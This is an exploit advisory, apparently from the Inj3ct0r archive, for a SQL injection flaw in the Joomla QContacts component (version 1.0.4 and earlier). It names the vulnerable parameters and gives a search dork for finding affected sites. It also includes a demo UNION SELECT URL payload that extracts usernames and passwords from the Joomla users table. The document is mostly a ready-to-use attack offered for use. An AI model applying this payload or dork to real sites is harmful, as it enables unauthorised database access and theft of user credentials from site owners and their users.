Joomla Component com_qcontacts SQL Injection Vulnerability
<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla Component com_qcontacts SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==========================================================
Joomla Component com_qcontacts SQL Injection Vulnerability
==========================================================
# Exploit Title: Joomla Component QContacts (com_qcontacts) – SQL Injection Vulnerability
# Date: 12, July 2010
# Author: _mlk_
# Software Link: http://bugsec.googlecode.com/files/Joomla_com_qcontacts.zip
# Version: 1.0.4 and previous
# Tested on: all OS
# CVE : 0
# Code : here
Joomla Component QContacts (com_qcontacts) – SQL Injection Vulnerability
#################################################################################################################
[+] Discovered by : _mlk_ (Renan)
[+] Teams : c00kies , BugSec , BotecoUnix & c0d3rs
[+] Homepages : http://code.google.com/p/bugsec/
http://botecounix.com.br/blog/
http://c0d3rs.wordpress.com/
[+] Location : Porto Alegre – RS, Brasil
(or Brazil)
#################################################################################################################
[-] Information
[?] Script : QContacts
[?] FAQ : http://www.latenight-coding.com/joomla-addons/qcontacts.html
[?] Versions Tested: 1.0.4 and previous
[?] Dork/String : "index.php?option=com_qcontacts" / "com_qcontacts"
[?] Date : 12, July 2010
—————————————————————————————————————–
[*] Parameters vuls :
Itemid
id
catid
—————————————————————————————————————–
[*] Example :
http://localhost/index.php?option=com_qcontacts&Itemid=1 [SQL-Inject]
http://localhost/[PATH]/index.php?option=com_qcontacts&Itemid=1 [SQL-Inject]
—————————————————————————————————————–
[*] Demo :
http://<server>/path/index.php?option=com_qcontacts&view=contact&id=1&Itemid=-541
+union+select+concat(id,0×3a,name,0×3a,username,0×3a,password)+from+cms01_users–
#################################################################################################################
[~] Agradecimentos :
Deus , Familiares , Amigos e Tricolor Ga?cho (Gr?mio) .
Em especial "i4k" ( alien o/ ) .
#################################################################################################################
# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-07-13]</pre><script type=’text/javascript’>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));</script><script type=’text/javascript’>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
Source: http://inj3ct0r.com/exploits/13320
Leave a Reply